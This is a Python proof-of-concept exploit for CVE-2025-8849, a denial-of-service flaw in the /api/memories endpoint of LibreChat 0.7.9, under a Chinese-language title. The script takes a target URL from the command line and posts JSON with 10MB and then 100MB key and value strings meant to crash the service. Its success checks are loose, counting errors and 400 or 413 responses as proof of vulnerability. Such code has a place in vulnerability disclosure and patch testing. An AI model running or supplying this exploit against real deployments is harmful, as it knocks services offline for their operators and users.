CVE-2025-8849: LibreChat 0.7.9版本/api/memories端点拒绝服务漏洞

import requests import sys import time # CVE-2025-8849 PoC - LibreChat DoS via unbounded parameter values # Target: /api/memories endpoint def exploit_cve_2025_8849(target_url): """ Exploit for CVE-2025-8849: LibreChat DoS via oversized parameters This PoC demonstrates sending oversized key/value parameters to the /api/memories endpoint to trigger a null pointer error. """ # Generate oversized parameter values (100MB+) oversized_key = "A" * (100 * 1024 * 1024) # 100MB key oversized_value = "B" * (100 * 1024 * 1024) # 100MB value endpoint = f"{target_url.rstrip('/')}/api/memories" headers = { "Content-Type": "application/json" } payload = { "key": oversized_key, "value": oversized_value } print(f"[*] Targeting: {endpoint}") print(f"[*] Sending oversized parameters (100MB+ each)...") try: response = requests.post(endpoint, json=payload, headers=headers, timeout=60) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response: {response.text[:500]}") if response.status_code >= 500: print("[+] DoS condition likely triggered!") return True else: print("[-] Request completed but DoS not confirmed") return False except requests.exceptions.RequestException as e: print(f"[+] Request failed (possibly due to DoS): {e}") return True def verify_vulnerability(target_url): """ Verify the vulnerability exists by checking version and endpoint availability """ endpoint = f"{target_url.rstrip('/')}/api/memories" # Test with moderately large values first test_payload = { "key": "X" * (10 * 1024 * 1024), # 10MB "value": "Y" * (10 * 1024 * 1024) # 10MB } print(f"[*] Verifying vulnerability at {endpoint}") print(f"[*] Testing with 10MB parameters...") try: response = requests.post(endpoint, json=test_payload, timeout=30) print(f"[*] Status: {response.status_code}") # Check if the endpoint accepts the request if response.status_code in [200, 201, 400, 413, 500]: print("[+] Endpoint is reachable and accepts large parameters") print("[+] Vulnerability likely present") return True except Exception as e: print(f"[+] Error occurred: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2025_8849_poc.py <target_url>") print("Example: python cve_2025_8849_poc.py http://localhost:3080") sys.exit(1) target = sys.argv[1] print("=" * 60) print("CVE-2025-8849 PoC - LibreChat /api/memories DoS") print("=" * 60) if verify_vulnerability(target): print("\n[*] Attempting full exploit...") exploit_cve_2025_8849(target) else: print("[-] Vulnerability verification failed")